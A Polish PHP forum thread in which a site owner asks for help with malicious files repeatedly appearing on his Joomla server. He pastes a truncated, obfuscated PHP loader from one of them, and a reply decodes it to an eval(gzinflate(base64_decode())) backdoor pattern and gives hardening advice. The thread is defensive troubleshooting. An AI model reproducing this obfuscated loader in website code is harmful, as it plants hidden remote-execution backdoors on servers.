[PHP]Problem z wirusem lub Joomla

[PHP]Problem z wirusem lub Joomla

damianoo Zobacz profil	28.09.2015, 19:27:44 Post #1
Grupa: Zarejestrowani Postów: 7 Pomógł: 0 Dołączył: 28.09.2015 Ostrzeżenie: (0%)	Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd. Proszę o pomoc. Część zawartości jednego z plików, w tym wypadku wp-error.php [PHP] pobierz, plaintext <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 = [PHP] pobierz, plaintext

Odpowiedzi

KsaR Zobacz profil	28.09.2015, 22:05:00 Post #2
Grupa: Zarejestrowani Postów: 520 Pomógł: 102 Dołączył: 15.07.2014 Skąd: NULL Ostrzeżenie: (0%)	Cytat(damianoo @ 28.09.2015, 20:27:44 ) Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd. Proszę o pomoc. Część zawartości jednego z plików, w tym wypadku wp-error.php [PHP] pobierz, plaintext <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1ub(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 = [PHP] pobierz, plaintext Po zdekodowaniu zmiennych: Cytat preg_replaceeval(gzinflate(base64_decode())); [PHP] pobierz, plaintext echo htmlspecialchars($ZjF4018, ENT_QUOTES, 'UTF-8'); echo htmlspecialchars($c1985, ENT_QUOTES, 'UTF-8'); echo htmlspecialchars($hMpvX6091, ENT_QUOTES, 'UTF-8'); [PHP] pobierz, plaintext Wylacz register_globals jeżeli jest wlaczone. Dokladniejszej analizy nie mam jak zrobic bo za mało kodu itp, a na Joomli sie nie znam (IMG:style_emoticons/default/tongue.gif) P Ale zakładam że ten plik jest gdzieś includowany? Bo inaczej bez sensu by był. Ale, byl podobny przypadek juz (IMG:style_emoticons/default/tongue.gif) : http://forum.php.pl/index.php?showtopic=24...p;#entry1160065 Czyli tak jak widac twoj wirus chyba nie pelny ( $xY4419 = ) Na tym sie konczy? Ten post edytował KsaR* 28.09.2015, 22:30:26